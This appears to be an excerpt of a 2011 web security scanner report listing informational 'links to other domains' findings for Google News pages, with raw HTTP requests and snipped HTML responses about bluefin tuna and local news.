<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://search.japantimes.co.jp/cgi-bin/nn20110203f3.html" class="usg-AFQjCNHZnYlp_nKuoVGKfnrmD1r9tnLW_A " title="The Japan Times"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw " title="Change.org"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1" class="usg-AFQjCNGPUf4wF77288my2Oclv1m5RQxCug " title="Journal Pioneer"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://www.globalpost.com/dispatch/asia/110120/tunarama-festival-australia" class="usg-AFQjCNFQ2uEA-uR_tqNgFltc180eKhocqQ " title="GlobalPost"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://www.courthousenews.com/2011/01/14/33343.htm" class="usg-AFQjCNFBEnOy9qhF4lsn7KivtVh9OzQpGw " title="Courthouse News Service"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;q=bluefin+tuna&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

16.31. http://news.google.com/news/section  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/section

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/section?pz=1&cf=all&ned=us&geo=detect_metro_area&ict=ln HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:03:20 GMT
Expires: Thu, 03 Feb 2011 01:03:20 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;geo=detect_metro_area&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&ned=us&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<a href="/news?pz=1&amp;cf=all&amp;ned=us&amp;ict=ln" class="persistentblue"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ss&amp;ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=w&amp;ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<span class="sel"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=n&amp;ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=b&amp;ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=t&amp;ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=e&amp;ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=s&amp;ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=m&amp;ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ir&amp;ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020205172.html" class="usg-AFQjCNFxuNFy1USPP8THyOtmX5L1acIOCQ " title="Washington Post"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/ukIw31-sUoeHNM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020205172.html" class="usg-AFQjCNFxuNFy1USPP8THyOtmX5L1acIOCQ "> Washington Post </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFxuNFy1USPP8THyOtmX5L1acIOCQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020205172.html" id="MAA4AEgAUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://blog.washingtonpost.com/clicktrack/2011/02/in_concert_robert_plant_and_th.html" class="usg-AFQjCNHywKYaWAN307i5PyFVHpvNwbkEUA " title="Washington Post (blog)"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/UpS_VqKmYiktzM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://blog.washingtonpost.com/clicktrack/2011/02/in_concert_robert_plant_and_th.html" class="usg-AFQjCNHywKYaWAN307i5PyFVHpvNwbkEUA "> Washington Post (blog) </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHywKYaWAN307i5PyFVHpvNwbkEUA " href="http://blog.washingtonpost.com/clicktrack/2011/02/in_concert_robert_plant_and_th.html" id="MAA4AEgBUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG-XE0s4f76impU6ECib_rPaYlMjw " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020205536.html" id="MAA4AEgCUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFW9zgsNv--LNOf6cHBzF1_fAmYbg " href="http://voices.washingtonpost.com/recruitinginsider/2011/02/national_signing_day_looking_a.html" id="MAA4AEgDUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEZtpbksbPvR2zDFDFHbp5dn7CbaQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020205506.html" id="MAA4AEgEUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNF93ZQc5SEN6QfJ-qnqmikbDZCO2g " href="http://voices.washingtonpost.com/virginiapolitics/2011/02/prince_william_officials_back.html" id="MAA4AEgFUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://dcist.com/2011/02/gilberts_coming_back.php" class="usg-AFQjCNEysYrNlNCqMTqj0SPZoIdDOIrmRg " title="DCist.com"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/otKhbOgweDGTPM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://dcist.com/2011/02/gilberts_coming_back.php" class="usg-AFQjCNEysYrNlNCqMTqj0SPZoIdDOIrmRg "> DCist.com </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHU1KuGhk65XMyZGLrSIehBOJQYjA " href="http://voices.washingtonpost.com/wizardsinsider/2011/02/jump-ball-would-you-rather-hav.html" id="MAA4AEgGUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://dcist.com/2011/02/gilberts_coming_back.php" target="_blank" class="usg-AFQjCNEysYrNlNCqMTqj0SPZoIdDOIrmRg " id="MAA4AEgGUAFgAmoCdXN6AA">Return of the Gilbert</a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNENZT9McoTW2ZPFZIuuzXzBpz3aTg " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020204839.html" id="MAA4AEgHUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGytgc8wgKelR4i7_XP5b63jnen5w " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020205704.html" id="MAA4AEgIUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFTZsnPXh9XQ9co49j95BBRf4TrZw " href="http://voices.washingtonpost.com/debonis/2011/02/egyptian_uprising_should_inspi.html" id="MAA4AEgJUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://thehill.com/blogs/blog-briefing-room/news/141845-nader-to-obama-why-voting-rights-for-egypt-but-not-dc" target="_blank" class="usg-AFQjCNEqspLf_xqlCUO2zyKdXXcBNb9O_g " id="MAA4AEgJUAFgAmoCdXN6AA">Nader to Obama: Why voting rights for Egypt, but not DC?</a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG-Rkl7iAuJAyXPD15tIKEYLPcYag " href="http://voices.washingtonpost.com/recruitinginsider/2011/02/national_signing_day_2011_osbo.html" id="MAA4AEgKUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www2.insidenova.com/news/2011/feb/02/osbourns-terrell-heading-south-ar-815510/" target="_blank" class="usg-AFQjCNEwcHLIE-ncFfCwdAxXSWGQRT5U3A " id="MAA4AEgKUAFgAmoCdXN6AA">Osbourn&#39;s Terrell staying in Virginia</a>
...[SNIP]...
<div class="aa-inner"><a href="http://dc.sbnation.com/2011/2/2/1970401/dominique-terrell-virginia-football-national-signing-day" target="_blank" class="usg-AFQjCNGOQOw3b0_sq_VToJkNFrN2wOpTog " id="MAA4AEgKUAJgAmoCdXN6AA">2011 National Signing Day: Dominique Terrell Chooses Virginia</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFzvqQTY0F7FTL2K6bv4ddshZE6KA " href="http://espn.go.com/blog/ncfnation/post/_/id/38911/good-day-for-acc-recruiting" id="MAA4AEgKUANgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGvYydJ0jTDT8YWnHLbpTO3dpDP4A " href="http://voices.washingtonpost.com/local-opinions/2011/02/gray_is_right_about_vouchers.html" id="MAA4AEgLUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEJVA26Iq4qwWBxSeojHWjCQIddwA " href="http://voices.washingtonpost.com/capitalsinsider/alex-ovechkin/alex-ovechkin-absent-from-prac.html" id="MAA4AEgMUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.baltimoresun.com/sports/bal-capitals-canadiens-0201,0,6320309.story" class="usg-AFQjCNEzULiej8KjDfhkBGbV_PnUD18SrQ " title="Baltimore Sun (blog)"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/pCwd7PgSuLH54M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.baltimoresun.com/sports/bal-capitals-canadiens-0201,0,6320309.story" class="usg-AFQjCNEzULiej8KjDfhkBGbV_PnUD18SrQ "> Baltimore Sun (blog) </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG4Ub4P13p6MGy4teA_-UU-IoF3uQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020203059.html" id="MAA4AEgNUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.welovedc.com/2011/02/02/habs-top-caps-in-shootout/" target="_blank" class="usg-AFQjCNFzSD2IbR5o3Xlgx6oW1ispa5CmVw " id="MAA4AEgNUAFgAmoCdXN6AA">Habs Top Caps in Shootout</a>
...[SNIP]...
<div class="aa-inner"><a href="http://dcsportsbox.com/main/index.php?option=com_content&amp;task=view&amp;id=2186&amp;Itemid=65" target="_blank" class="usg-AFQjCNHAjwkDMB7yLPiwNX9HN6xLlt459A " id="MAA4AEgNUAJgAmoCdXN6AA">Caps Can&#39;t Hold Lead, Missed Opportunities Lead to Shootout Loss vs. Canadiens</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHDvo6_1fd8KUVikkjS55uU40PLPQ " href="http://www.csnwashington.com/02/02/11/Capitals-Canadiens-instant-analysis/landing.html?blockID=402201&amp;feedID=274" id="MAA4AEgNUANgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEwiIRSOARVGT7jtXodec47V90ULQ " href="http://washingtonexaminer.com/blogs/loose-pucks/2011/02/caps-postgame-3-2-loss-canadiens" id="MAA4AEgNUARgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF5cjTYVfkRCkmOJQkFw7lyYq_o6Q " href="http://www.sbnation.com/nhl/2011/2/2/1969965/capitals-canadiens-brian-gionta" id="MAA4AEgNUAVgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020205141.html" class="usg-AFQjCNEHsRTNIJT2MzJF0RiRgdoNK6wzaw " title="Washington Post"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/dDUKlmuvNYogBM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020205141.html" class="usg-AFQjCNEHsRTNIJT2MzJF0RiRgdoNK6wzaw "> Washington Post </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEHsRTNIJT2MzJF0RiRgdoNK6wzaw " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020205141.html" id="MAA4AEgOUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHIR7ZcryMOXMitIqwP71dDlVRgsg " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020204938.html" id="MAA4AEgPUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEcsg4QKrWmBDTMufp1JmBWg5aUbg " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020204695.html" id="MAA4AEgQUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGTft62-0NO-12I1yQ1t5kK-69LzQ " href="http://weblogs.baltimoresun.com/sports/college/recruiting/2011/02/punting_coach_weighs_in_on_terps_signee_renfro.html" id="MAA4AEgRUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGp2ZYC_Ig2x1wAfxehFhKPUkT6Bg " href="http://www.usnews.com/opinion/blogs/susan-milligan/2011/02/02/republican-healthcare-repeal-push-hurts-mitt-romney-in-2012.html" id="MAA4AEgSUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.usatoday.com/news/nation/2011-02-02-groundhog-day-phil_N.htm" class="usg-AFQjCNHn2nqkzYHbgRjk_QYRs-Gzq92jAg " title="USA Today"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/fF04D-YSgEIigM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.usatoday.com/news/nation/2011-02-02-groundhog-day-phil_N.htm" class="usg-AFQjCNHn2nqkzYHbgRjk_QYRs-Gzq92jAg "> USA Today </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGcDPAnsjLc1-viY7WRJRvn4YgOew " href="http://www.usnews.com/opinion/blogs/kevin-huffman/2011/02/02/the-washington-budget-process-is-the-definition-of-insanity" id="MAA4AEgTUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Y3a-2jcwai0">Video:&nbsp;
Groundhog predicts early spring
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://voices.washingtonpost.com/local-breaking-news/maryland/md-groundhog-predicts-6-more-w.html" target="_blank" class="usg-AFQjCNESh3XXlVdlgnmDBQS4ZqBWo7HKPA " id="MAA4AEgTUAFgAmoCdXN6AA">Md. groundhog: Six more weeks of winter</a>
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;geo=detect_metro_area&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

16.32. http://news.google.com/news/section  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/section

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/section?pz=1&cf=all&q=bluefin+tuna&ict=ln HTTP/1.1
Host: news.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 23:35:51 GMT
Expires: Wed, 02 Feb 2011 23:35:51 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 132251

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;q=bluefin+tuna&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?q=bluefin+tuna&hl=en&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<a href="/news?pz=1&amp;cf=all&amp;ned=us&amp;ict=ln" class="persistentblue"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ss&amp;ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=w&amp;ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;geo=detect_metro_area&amp;ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=n&amp;ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=b&amp;ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=t&amp;ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=e&amp;ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=s&amp;ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=m&amp;ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ir&amp;ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw " title="Change.org"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/jTNUn2OVcHDKyM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw "> Change.org </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw " href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" id="MAA4AEgAUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHcMze2ae6ebOI2C3PaK6ur06hVxA " href="http://www.abc.net.au/rural/news/content/201102/s3126694.htm" id="MAA4AEgBUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1" class="usg-AFQjCNGPUf4wF77288my2Oclv1m5RQxCug " title="Journal Pioneer"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/h6cjkbvjeTNmZM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1" class="usg-AFQjCNGPUf4wF77288my2Oclv1m5RQxCug "> Journal Pioneer </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGPUf4wF77288my2Oclv1m5RQxCug " href="http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1" id="MAA4AEgCUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGsIpimsSlc6862oQxES7yIG08YKw " href="http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html" id="MAA4AEgDUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHlrZSVNM6Zz6hhcU2h9fR5HO18TQ " href="http://www.kansascity.com/2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html" id="MAA4AEgEUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.mpbn.net/News/MaineHeadlineNews/tabid/968/ctl/ViewItem/mid/3479/ItemId/14769/Default.aspx" target="_blank" class="usg-AFQjCNGo-CB9ZWSi7CQDkz5h4dPyoFpbkA " id="MAA4AEgEUAFgAmoCdXN6AA">Feds Hear Maine Fishermen&#39;s Concerns About <b>
...[SNIP]...
<div class="aa-inner"><a href="http://search.japantimes.co.jp/cgi-bin/fl20110109x1.html" target="_blank" class="usg-AFQjCNHJgKrjx821lalk2U6xhw6rFd8OBw " id="MAA4AEgEUAJgAmoCdXN6AA">Are Japan&#39;s fish lovers eating <b>
...[SNIP]...
